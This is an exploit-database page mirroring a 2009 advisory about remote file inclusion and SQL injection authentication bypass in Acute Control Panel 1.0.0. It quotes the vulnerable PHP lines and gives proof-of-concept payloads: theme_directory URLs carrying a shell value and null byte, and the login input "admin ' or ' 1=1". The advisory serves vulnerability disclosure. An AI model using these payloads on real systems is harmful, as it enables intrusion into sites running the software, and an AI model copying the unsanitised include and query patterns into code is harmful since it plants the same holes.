Lucene search
+L

acute control panel 1.0.0 - SQL Injection / Remote File Inclusion

🗓️ 26 Mar 2009 00:00:00Reported by SirGodType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

Remote File Inclusion and SQL Injection in Acute Control Panel 1.0.

Related
Code
ReporterTitlePublishedViews
Family
canvas
Immunity Canvas: ACUTECP_RFI
6 Apr 200916:30
canvas
Circl
CVE-2009-1247
26 Mar 200900:00
circl
Circl
CVE-2009-1248
26 Mar 200900:00
circl
CVE
CVE-2009-1247
6 Apr 200916:00
cve
CVE
CVE-2009-1248
6 Apr 200916:00
cve
Cvelist
CVE-2009-1247
6 Apr 200916:00
cvelist
Cvelist
CVE-2009-1248
6 Apr 200916:00
cvelist
EUVD
EUVD-2009-1246
7 Oct 202500:30
euvd
EUVD
EUVD-2009-1247
7 Oct 202500:30
euvd
NVD
CVE-2009-1247
6 Apr 200916:30
nvd
Rows per page
###############################################################
[+] Acute Control Panel 1.0.0 RFI/SQL Injection (Auth Bypass)
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
###############################################################

[+] Remote File Inclusion

 Vulnerable code in container.php

-----------------------------------------------------------
<?php include_once($theme_directory."/sidebar.php"); ?>
-----------------------------------------------------------

 PoC :

  http://127.0.0.1/themes/container.php?theme_directory=[Shell]%00

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 Vulnerable code in header.php

--------------------------------------------------------------
<?php include_once($theme_directory."/navigation.php"); ?>
--------------------------------------------------------------

 PoC :

  http://127.0.0.1/themes/header.php?theme_directory=[Shell]%00

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[+] SQL Injection (Auth Bypass)

 Vulnerable code in login.php

--------------------------------------------
$query = mysql_query("SELECT
id,username,password,email,fullname,permissions FROM `users` WHERE
username='$username' AND password='$password'", $conn) or
die(mysql_error());
--------------------------------------------

 PoC :

  Username : admin ' or ' 1=1
  Password : anything or nothing

################################################################

# milw0rm.com [2009-03-26]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Mar 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.10366
32